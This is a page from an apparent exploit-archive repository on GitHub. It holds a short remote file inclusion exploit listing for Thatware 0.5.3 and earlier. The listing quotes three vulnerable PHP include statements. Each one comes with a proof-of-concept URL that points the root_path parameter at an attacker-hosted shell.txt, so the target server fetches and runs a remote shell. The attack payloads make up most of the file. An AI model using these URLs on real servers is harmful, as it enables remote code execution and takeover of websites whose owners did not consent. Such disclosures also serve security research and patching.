forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10070.txt
37 lines (33 loc) · 1.1 KB
/
10070.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Thatware <= 0.5.3 Multiple Remote File Include Exploit
======================================================
########################################################################
#Thatware <= 0.5.3 Multiple Remote File Include Exploit
#Download Script : http://sourceforge.net/projects/thatware/files
########################################################################
#
#Vuln : ./thatware_path/config.php (line 4)
#
# <?php
# include $root_path."db_settings.php";
# ?>
#
#PoC : http://server/config.php?root_path=http://[attcker]/shell.txt???
#
#Vuln : ./thatware_path/artlist.php (line 28)
#
# <?php
# include $root_path.'thatfile.php';
# ?>
#
#PoC : http://server/artlist.php?root_path=http://[attcker]/shell.txt???
#
#Vuln : ./thatware_path/thatfile.php (line 130)
#
# <?php
# if(file_exists($root_path.'config.php'))
# include($root_path.'config.php');
# ?>
#
#PoC : http://server/thatfile.php?root_path=http://[attcker]/shell.txt???
#
########################################################################